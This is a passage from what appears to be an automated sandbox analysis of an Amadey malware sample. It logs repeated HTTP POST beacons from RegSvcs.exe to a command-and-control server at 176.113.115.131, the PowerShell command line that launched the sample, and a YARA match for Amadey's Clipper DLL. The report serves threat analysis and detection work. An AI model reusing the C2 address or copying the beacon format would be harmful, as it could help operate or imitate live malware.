                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:21.393930912 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    88 | 192.168.2.4 | 56145 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:23.063477039 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:23.755655050 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    89 | 192.168.2.4 | 56146 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:25.270421028 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:25.968200922 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    90 | 192.168.2.4 | 56147 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:27.595093966 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:28.306273937 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    91 | 192.168.2.4 | 56148 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:29.828583002 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:30.519975901 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    92 | 192.168.2.4 | 56149 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:32.163258076 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:32.853739977 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:32 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    93 | 192.168.2.4 | 56150 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:34.376355886 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:35.080810070 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    94 | 192.168.2.4 | 56151 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:36.747241020 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:37.467457056 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    95 | 192.168.2.4 | 56152 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:38.986635923 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:39.706770897 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    96 | 192.168.2.4 | 56153 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:41.348551035 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:42.036473036 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    97 | 192.168.2.4 | 56154 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:43.548326015 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:44.265183926 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    98 | 192.168.2.4 | 56155 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:45.907608032 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:46.605041981 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    99 | 192.168.2.4 | 56156 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:48.125080109 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:48.840301991 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    100 | 192.168.2.4 | 56157 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:50.469605923 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:51.176527977 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    101 | 192.168.2.4 | 56158 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:52.703536987 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:53.412576914 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:53 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    102 | 192.168.2.4 | 56159 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:55.055404902 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:55.740772963 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    103 | 192.168.2.4 | 56160 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:57.256735086 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:57.976516962 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    104 | 192.168.2.4 | 56161 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:59.609930038 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:46:00.308507919 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:46:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    105 | 192.168.2.4 | 56162 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:46:01.828758955 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:46:02.527359962 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:46:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Target ID:0
                                                    Start time:02:41:55
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1"
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: 00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:02:41:55
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:02:41:57
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\System32\ipconfig.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                                    Imagebase:0x7ff607f10000
                                                    File size:35'840 bytes
